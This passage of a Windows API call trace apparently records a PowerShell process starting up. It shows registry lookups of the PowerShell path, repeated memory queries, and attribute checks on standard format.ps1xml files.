lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0 [0067.829] CoTaskMemFree (pv=0x23ed40) [0067.829] RegCloseKey (hKey=0x348) returned 0x0 [0067.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0067.935] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.944] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.945] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.945] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.946] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.947] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.948] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.950] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.973] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.973] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.973] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.974] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.974] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.974] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.974] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.974] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.980] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.985] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.985] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.986] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.986] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.986] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.987] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.987] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.987] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.988] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.988] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.988] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.988] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.988] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.991] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.993] VirtualQuery (in: lpAddress=0x12bfe0, lpBuffer=0x12cea0, dwLength=0x30 | out: lpBuffer=0x12cea0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.993] VirtualQuery (in: lpAddress=0x12bfe0, lpBuffer=0x12cea0, dwLength=0x30 | out: lpBuffer=0x12cea0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.994] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.995] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.014] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.014] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.014] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.020] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.020] CoTaskMemFree (pv=0x230110) [0068.022] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.026] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.026] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.027] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.027] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.028] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.028] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.029] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.031] VirtualQuery (in: lpAddress=0x12bfd0, lpBuffer=0x12ce90, dwLength=0x30 | out: lpBuffer=0x12ce90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x344) returned 0x0 [0068.032] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d49c, lpData=0x0, lpcbData=0x12d498*=0x0 | out: lpType=0x12d49c*=0x1, lpData=0x0, lpcbData=0x12d498*=0x74) returned 0x0 [0068.032] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d40c, lpData=0x0, lpcbData=0x12d408*=0x0 | out: lpType=0x12d40c*=0x1, lpData=0x0, lpcbData=0x12d408*=0x74) returned 0x0 [0068.032] CoTaskMemAlloc (cb=0x78) returned 0x26a760 [0068.032] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x12d3dc, lpData=0x26a760, lpcbData=0x12d3d8*=0x74 | out: lpType=0x12d3dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d3d8*=0x74) returned 0x0 [0068.032] CoTaskMemFree (pv=0x26a760) [0068.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0068.032] SetErrorMode (uMode=0x1) returned 0x1 [0068.032] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0068.032] SetErrorMode (uMode=0x1) returned 0x1 [0068.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.033] SetErrorMode (uMode=0x1) returned 0x1 [0068.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0068.033] SetErrorMode (uMode=0x1) returned 0x1 [0068.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0068.033] SetErrorMode (uMode=0x1) returned 0x1 [0068.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0068.034] SetErrorMode (uMode=0x1) returned 0x1 [0068.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.034] SetErrorMode (uMode=0x1) returned 0x1 [0068.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0068.034] SetErrorMode (uMode=0x1) returned 0x1 [0068.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.034] SetErrorMode (uMode=0x1) returned 0x1 [0068.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0068.034] SetErrorMode (uMode=0x1) returned 0x1 [0068.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.035] SetErrorMode (uMode=0x1) returned 0x1 [0068.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0068.035] SetErrorMode (uMode=0x1) returned 0x1 [0068.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.035] SetErrorMode (uMode=0x1) returned 0x1 [0068.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0068.035] SetErrorMode (uMode=0x1) returned 0x1 [0068.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0068.036] SetErrorMode (uMode=0x1) returned 0x1 [0068.036] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0068.036] SetErrorMode (uMode=0x1) returned 0x1 [0068.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0068.036] SetErrorMode (uMode=0x1) returned 0x1 [0068.036] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0068.036] SetErrorMode (uMode=0x1) returned 0x1 [0068.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0068.036] SetErrorMode (uMode=0x1) returned 0x1 [0068.036] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: 